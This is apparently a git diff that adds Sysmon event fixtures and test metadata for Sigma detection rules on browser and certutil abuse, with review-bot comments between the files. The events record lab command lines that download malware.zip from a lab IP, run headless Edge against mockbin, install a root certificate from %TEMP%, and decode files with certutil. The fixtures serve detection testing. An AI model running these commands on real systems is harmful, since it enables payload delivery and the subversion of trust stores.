@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-26T23:25:03.181097Z" + } + }, + "EventRecordID": 32923086, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-26 23:25:03.169", + "ProcessGuid": "5AA13A44-ADCF-68FE-295E-000000004002", + "ProcessId": 4788, + "Image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", + "FileVersion": "141.0.7390.123", + "Description": "Google Chrome", + "Product": "Google Chrome", + "Company": "Google LLC", + "OriginalFileName": "chrome.exe", + "CommandLine": "\"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\" --load-extension=\"C:\\Users\\user\\AppData\\Local\\Temp\\HHe2lr\"", + "CurrentDirectory": "C:\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=F946FD910D1D2B6BF54DDD57FEBF5F066058BC5A,MD5=36E9DFE8CEAE9E88100C6BBD1550DEDD,SHA256=6A9CF74C9FA74C16EA6F26351FA5EF8CE11191DBBD5EEADCB2591904767B96B0,IMPHASH=3E82AE93B8102462DDA81604AF164E8E", + "ParentProcessGuid": "5AA13A44-0C90-68FC-BF1D-000000004002", + "ParentProcessId": 10048, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} 
diff --git a/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_load_extension/info.yml b/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_load_extension/info.yml
new file mode 100644
index 000000000..48a2dca40
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_load_extension/info.yml
@@ -0,0 +1,12 @@
+id: e159e6ce-c717-4a38-af44-ff8c4f011c37
+description: N/A
+date: 2025-10-24
+author: SigmaHQ Team
+rule_metadata:
+ - id: 88d6e60c-759d-4ac1-a447-c0f1466c2d21
+ title: Chromium Browser Instance Executed With Custom Extension
+regression_tests_info:
+ - name: Positive Detection Test
+ type: evtx
+ provider: Microsoft-Windows-Sysmon
+ path: regression_data/windows/process_creation/proc_creation_win_browsers_chromium_load_extension/88d6e60c-759d-4ac1-a447-c0f1466c2d21.evtx
diff --git a/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse/1c526788-0abe-4713-862f-b520da5e5316.evtx b/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse/1c526788-0abe-4713-862f-b520da5e5316.evtx
new file mode 100644
index 000000000..b078b6611
Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse/1c526788-0abe-4713-862f-b520da5e5316.evtx differ
diff --git a/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse/1c526788-0abe-4713-862f-b520da5e5316.json b/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse/1c526788-0abe-4713-862f-b520da5e5316.json
new file mode 100644
index 000000000..3713caf79
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse/1c526788-0abe-4713-862f-b520da5e5316.json
@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-26T23:28:43.862519Z" + } + }, + "EventRecordID": 32995046, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-26 23:28:43.810", + "ProcessGuid": "5AA13A44-AEAB-68FE-435E-000000004002", + "ProcessId": 5784, + "Image": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", + "FileVersion": "141.0.3537.99", + "Description": "Microsoft Edge", + "Product": "Microsoft Edge", + "Company": "Microsoft Corporation", + "OriginalFileName": "msedge.exe", + "CommandLine": "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --headless=new --disable-gpu https://mockbin.org/bin/31b1332f-8f5c-490e-8ec0-78e77b4e5709", + "CurrentDirectory": "C:\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=77B843BADE25E2B6FEA4ED02D9DCFDB32759285A,MD5=2CB9DCC4B733F88A7155F0D63AC634B8,SHA256=151A7E879BB4B534AC95D61B982C899CFF3DC01EDC2575FC8D71B3B9B44C8834,IMPHASH=4C2A67DEB457B8BF9F317820EE11E05D", + "ParentProcessGuid": "5AA13A44-0C90-68FC-BF1D-000000004002", + "ParentProcessId": 10048, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", + "ParentUser": 
"ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse/info.yml b/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse/info.yml new file mode 100644 index 000000000..7ad3f91ab --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse/info.yml @@ -0,0 +1,12 @@ +id: 686da1dd-caec-47d8-a254-07ab54f1f3c7 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 1c526788-0abe-4713-862f-b520da5e5316 + title: Chromium Browser Headless Execution To Mockbin Like Site +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + path: regression_data/windows/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse/1c526788-0abe-4713-862f-b520da5e5316.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_susp_load_extension/27ba3207-dd30-4812-abbf-5d20c57d474e.evtx b/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_susp_load_extension/27ba3207-dd30-4812-abbf-5d20c57d474e.evtx new file mode 100644 index 000000000..c40cb656d Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_susp_load_extension/27ba3207-dd30-4812-abbf-5d20c57d474e.evtx differ diff --git a/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_susp_load_extension/27ba3207-dd30-4812-abbf-5d20c57d474e.json b/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_susp_load_extension/27ba3207-dd30-4812-abbf-5d20c57d474e.json new file mode 100644 index 000000000..2582912bf --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_susp_load_extension/27ba3207-dd30-4812-abbf-5d20c57d474e.json 
@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-26T23:30:09.492105Z" + } + }, + "EventRecordID": 33024467, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-26 23:30:09.480", + "ProcessGuid": "5AA13A44-AF01-68FE-535E-000000004002", + "ProcessId": 2536, + "Image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", + "FileVersion": "141.0.7390.123", + "Description": "Google Chrome", + "Product": "Google Chrome", + "Company": "Google LLC", + "OriginalFileName": "chrome.exe", + "CommandLine": "\"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\" --load-extension=\"C:\\Users\\user\\AppData\\Local\\Temp\\HHe2lr\"", + "CurrentDirectory": "C:\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=F946FD910D1D2B6BF54DDD57FEBF5F066058BC5A,MD5=36E9DFE8CEAE9E88100C6BBD1550DEDD,SHA256=6A9CF74C9FA74C16EA6F26351FA5EF8CE11191DBBD5EEADCB2591904767B96B0,IMPHASH=3E82AE93B8102462DDA81604AF164E8E", + "ParentProcessGuid": "5AA13A44-0C90-68FC-BF1D-000000004002", + "ParentProcessId": 10048, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} 
diff --git a/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_susp_load_extension/info.yml b/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_susp_load_extension/info.yml
new file mode 100644
index 000000000..7db676ffb
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_susp_load_extension/info.yml
@@ -0,0 +1,12 @@
+id: 78e88bc4-deea-488e-a27f-b4d9d07d3a72
+description: N/A
+date: 2025-10-24
+author: SigmaHQ Team
+rule_metadata:
+ - id: 27ba3207-dd30-4812-abbf-5d20c57d474e
+ title: Suspicious Chromium Browser Instance Executed With Custom Extension
+regression_tests_info:
+ - name: Positive Detection Test
+ type: evtx
+ provider: Microsoft-Windows-Sysmon
+ path: regression_data/windows/process_creation/proc_creation_win_browsers_chromium_susp_load_extension/27ba3207-dd30-4812-abbf-5d20c57d474e.evtx
diff --git a/regression_data/windows/process_creation/proc_creation_win_browsers_inline_file_download/94771a71-ba41-4b6e-a757-b531372eaab6.evtx b/regression_data/windows/process_creation/proc_creation_win_browsers_inline_file_download/94771a71-ba41-4b6e-a757-b531372eaab6.evtx
new file mode 100644
index 000000000..a4c87ed0f
Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_browsers_inline_file_download/94771a71-ba41-4b6e-a757-b531372eaab6.evtx differ
diff --git a/regression_data/windows/process_creation/proc_creation_win_browsers_inline_file_download/94771a71-ba41-4b6e-a757-b531372eaab6.json b/regression_data/windows/process_creation/proc_creation_win_browsers_inline_file_download/94771a71-ba41-4b6e-a757-b531372eaab6.json
new file mode 100644
index 000000000..a55107e51
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_browsers_inline_file_download/94771a71-ba41-4b6e-a757-b531372eaab6.json
@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-26T23:34:35.016637Z" + } + }, + "EventRecordID": 33119645, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-26 23:34:35.002", + "ProcessGuid": "5AA13A44-B00B-68FE-9F5E-000000004002", + "ProcessId": 4584, + "Image": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", + "FileVersion": "141.0.3537.99", + "Description": "Microsoft Edge", + "Product": "Microsoft Edge", + "Company": "Microsoft Corporation", + "OriginalFileName": "msedge.exe", + "CommandLine": "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" \"http://10.0.1.14/malware.zip\"", + "CurrentDirectory": "C:\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=77B843BADE25E2B6FEA4ED02D9DCFDB32759285A,MD5=2CB9DCC4B733F88A7155F0D63AC634B8,SHA256=151A7E879BB4B534AC95D61B982C899CFF3DC01EDC2575FC8D71B3B9B44C8834,IMPHASH=4C2A67DEB457B8BF9F317820EE11E05D", + "ParentProcessGuid": "5AA13A44-0C90-68FC-BF1D-000000004002", + "ParentProcessId": 10048, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} 
diff --git a/regression_data/windows/process_creation/proc_creation_win_browsers_inline_file_download/info.yml b/regression_data/windows/process_creation/proc_creation_win_browsers_inline_file_download/info.yml
new file mode 100644
index 000000000..216b271d5
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_browsers_inline_file_download/info.yml
@@ -0,0 +1,12 @@
+id: c7f0da2b-2eb9-46ee-abd0-d2f8e3c81975
+description: N/A
+date: 2025-10-24
+author: SigmaHQ Team
+rule_metadata:
+ - id: 94771a71-ba41-4b6e-a757-b531372eaab6
+ title: File Download From Browser Process Via Inline URL
+regression_tests_info:
+ - name: Positive Detection Test
+ type: evtx
+ provider: Microsoft-Windows-Sysmon
+ path: regression_data/windows/process_creation/proc_creation_win_browsers_inline_file_download/94771a71-ba41-4b6e-a757-b531372eaab6.evtx
diff --git a/regression_data/windows/process_creation/proc_creation_win_browsers_tor_execution/62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c.evtx b/regression_data/windows/process_creation/proc_creation_win_browsers_tor_execution/62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c.evtx
new file mode 100644
index 000000000..c82d3ad0f
Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_browsers_tor_execution/62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c.evtx differ
diff --git a/regression_data/windows/process_creation/proc_creation_win_browsers_tor_execution/62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c.json b/regression_data/windows/process_creation/proc_creation_win_browsers_tor_execution/62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c.json
new file mode 100644
index 000000000..c9efaed51
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_browsers_tor_execution/62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c.json
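Review bot: The test carries no `description` (`N/A`) and no `match_count`, so the expected trigger is recorded nowhere except inside the binary .evtx; the certutil tests in this same change set `match_count: 1`, and this entry should follow suit so a zero-or-many regression is caught. Proposed: `description: msedge.exe launched from cmd.exe with an inline URL to http://10.0.1.14/malware.zip (lab address); expected to match 94771a71 once` plus `match_count: 1`. The command line quoted here is taken from the rendered event in the preceding hunk.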
@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-26T23:39:33.565515Z" + } + }, + "EventRecordID": 33232425, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-26 23:39:33.564", + "ProcessGuid": "5AA13A44-B135-68FE-035F-000000004002", + "ProcessId": 10712, + "Image": "C:\\Users\\Administrator\\Desktop\\Tor Browser\\Browser\\firefox.exe", + "FileVersion": "128.14.0", + "Description": "Tor Browser", + "Product": "Tor Browser", + "Company": "Mozilla Corporation", + "OriginalFileName": "firefox.exe", + "CommandLine": "\"C:\\Users\\Administrator\\Desktop\\Tor Browser\\Browser\\firefox.exe\"", + "CurrentDirectory": "C:\\Users\\Administrator\\Desktop\\Tor Browser\\Browser\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "Medium", + "Hashes": "SHA1=9D317F48BA264346D1BA2DA10B0893B156FA69BF,MD5=66D34277F992DB4CA8561FD1A5C483E4,SHA256=683574EBC203C630AF98256516D7CBC50E270E7C5A56E1D46CB9CA671B3D9F32,IMPHASH=EEC7642CF938691D739D1F9BED0DF74D", + "ParentProcessGuid": "5AA13A44-B135-68FE-025F-000000004002", + "ParentProcessId": 1292, + "ParentImage": "C:\\Users\\Administrator\\Desktop\\Tor Browser\\Browser\\firefox.exe", + "ParentCommandLine": "\"C:\\Users\\Administrator\\Desktop\\Tor 
Browser\\Browser\\firefox.exe\"",
+ "ParentUser": "ATTACKRANGE\\Administrator"
+ }
+ }
+}
diff --git a/regression_data/windows/process_creation/proc_creation_win_browsers_tor_execution/info.yml b/regression_data/windows/process_creation/proc_creation_win_browsers_tor_execution/info.yml
new file mode 100644
index 000000000..267915f73
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_browsers_tor_execution/info.yml
@@ -0,0 +1,12 @@
+id: 8e750cec-bc57-4b20-bd0a-006733558c56
+description: N/A
+date: 2025-10-24
+author: SigmaHQ Team
+rule_metadata:
+ - id: 62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c
+ title: Tor Client/Browser Execution
+regression_tests_info:
+ - name: Positive Detection Test
+ type: evtx
+ provider: Microsoft-Windows-Sysmon
+ path: regression_data/windows/process_creation/proc_creation_win_browsers_tor_execution/62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c.evtx
diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_certificate_installation/d2125259-ddea-4c1c-9c22-977eb5b29cf0.evtx b/regression_data/windows/process_creation/proc_creation_win_certutil_certificate_installation/d2125259-ddea-4c1c-9c22-977eb5b29cf0.evtx
new file mode 100644
index 000000000..4526bfaff
Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_certutil_certificate_installation/d2125259-ddea-4c1c-9c22-977eb5b29cf0.evtx differ
diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_certificate_installation/d2125259-ddea-4c1c-9c22-977eb5b29cf0.json b/regression_data/windows/process_creation/proc_creation_win_certutil_certificate_installation/d2125259-ddea-4c1c-9c22-977eb5b29cf0.json
new file mode 100644
index 000000000..b55c1820b
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_certutil_certificate_installation/d2125259-ddea-4c1c-9c22-977eb5b29cf0.json
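Review bot: The Tor test should state its expected hit count: the rendered event shows the launched `firefox.exe` and its parent both living under `...\Desktop\Tor Browser\Browser\`, so if the .evtx also contains the parent's process-creation record the rule fires twice, and with `match_count` absent the test cannot tell one from two. Set `match_count:` to the verified number of matching records and replace `description: N/A` with something like `description: Tor Browser firefox.exe spawned by the Tor Browser launcher from the user's Desktop, IntegrityLevel Medium`. Whether the parent record is in the binary is not visible here and needs checking before the count is committed.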
@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T16:54:23.873276Z" + } + }, + "EventRecordID": 11383720, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 16:54:23.866", + "ProcessGuid": "5AA13A44-00BF-68FD-3F35-000000004002", + "ProcessId": 8592, + "Image": "C:\\Windows\\System32\\certutil.exe", + "FileVersion": "10.0.20348.4163 (WinBuild.160101.0800)", + "Description": "CertUtil.exe", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "CertUtil.exe", + "CommandLine": "certutil -addstore -f root C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\cert.cer", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=317E563BFC7EC87B181D5A1745E43B8F5288DBFC,MD5=A561A96624CA5CD5491BFC1609E2958A,SHA256=D5B7E8E44F37B1FBD79A79E3321244EEF946F419151374BD1BE4D6833754FED8,IMPHASH=02CB6949ACFAA0B84149D99111C16734", + "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", + "ParentProcessId": 6304, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + 
}
+ }
+}
diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_certificate_installation/info.yml b/regression_data/windows/process_creation/proc_creation_win_certutil_certificate_installation/info.yml
new file mode 100644
index 000000000..ed41b8f49
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_certutil_certificate_installation/info.yml
@@ -0,0 +1,13 @@
+id: 5969ddb0-b4ab-47c9-a12b-471d6c6551c8
+description: N/A
+date: 2025-10-24
+author: SigmaHQ Team
+rule_metadata:
+ - id: d2125259-ddea-4c1c-9c22-977eb5b29cf0
+ title: New Root Certificate Installed Via Certutil.EXE
+regression_tests_info:
+ - name: Positive Detection Test
+ type: evtx
+ provider: Microsoft-Windows-Sysmon
+ match_count: 1
+ path: regression_data/windows/process_creation/proc_creation_win_certutil_certificate_installation/d2125259-ddea-4c1c-9c22-977eb5b29cf0.evtx
diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_decode/cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7.evtx b/regression_data/windows/process_creation/proc_creation_win_certutil_decode/cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7.evtx
new file mode 100644
index 000000000..5c755afbd
Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_certutil_decode/cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7.evtx differ
diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_decode/cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7.json b/regression_data/windows/process_creation/proc_creation_win_certutil_decode/cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7.json
new file mode 100644
index 000000000..46c374057
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_certutil_decode/cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7.json
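Review bot: `description: N/A` drops the one piece of context a maintainer needs for a root-store test: the rendered event shows `certutil -addstore -f root` with a certificate under the user's `%TEMP%` (8.3 form `ADMINI~1`), run at `IntegrityLevel: High` from cmd.exe and without a `-user` switch, so presumably the machine store was targeted. Proposed: `description: certutil -addstore -f root %TEMP%\cert.cer from an elevated cmd.exe (machine store); expected to match d2125259 once`. Recording this keeps the sample meaningful if the rule is later narrowed to the LocalMachine store or to non-elevated callers.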
@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T16:56:16.019794Z" + } + }, + "EventRecordID": 11418519, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 16:56:16.013", + "ProcessGuid": "5AA13A44-0130-68FD-4E35-000000004002", + "ProcessId": 5112, + "Image": "C:\\Windows\\System32\\certutil.exe", + "FileVersion": "10.0.20348.4163 (WinBuild.160101.0800)", + "Description": "CertUtil.exe", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "CertUtil.exe", + "CommandLine": "certutil -decode file.base64 file-decoded.ext", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=317E563BFC7EC87B181D5A1745E43B8F5288DBFC,MD5=A561A96624CA5CD5491BFC1609E2958A,SHA256=D5B7E8E44F37B1FBD79A79E3321244EEF946F419151374BD1BE4D6833754FED8,IMPHASH=02CB6949ACFAA0B84149D99111C16734", + "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", + "ParentProcessId": 6304, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} 
diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_decode/info.yml b/regression_data/windows/process_creation/proc_creation_win_certutil_decode/info.yml
new file mode 100644
index 000000000..c1ab6ac35
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_certutil_decode/info.yml
@@ -0,0 +1,13 @@
+id: e582dfce-5cb3-4991-9719-9a336eb90a6f
+description: N/A
+date: 2025-10-24
+author: SigmaHQ Team
+rule_metadata:
+ - id: cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7
+ title: File Decoded From Base64/Hex Via Certutil.EXE
+regression_tests_info:
+ - name: Positive Detection Test
+ type: evtx
+ provider: Microsoft-Windows-Sysmon
+ match_count: 1
+ path: regression_data/windows/process_creation/proc_creation_win_certutil_decode/cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7.evtx
diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_download/19b08b1c-861d-4e75-a1ef-ea0c1baf202b.evtx b/regression_data/windows/process_creation/proc_creation_win_certutil_download/19b08b1c-861d-4e75-a1ef-ea0c1baf202b.evtx
new file mode 100644
index 000000000..429f79e94
Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_certutil_download/19b08b1c-861d-4e75-a1ef-ea0c1baf202b.evtx differ
diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_download/19b08b1c-861d-4e75-a1ef-ea0c1baf202b.json b/regression_data/windows/process_creation/proc_creation_win_certutil_download/19b08b1c-861d-4e75-a1ef-ea0c1baf202b.json
new file mode 100644
index 000000000..27dce7a6b
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_certutil_download/19b08b1c-861d-4e75-a1ef-ea0c1baf202b.json
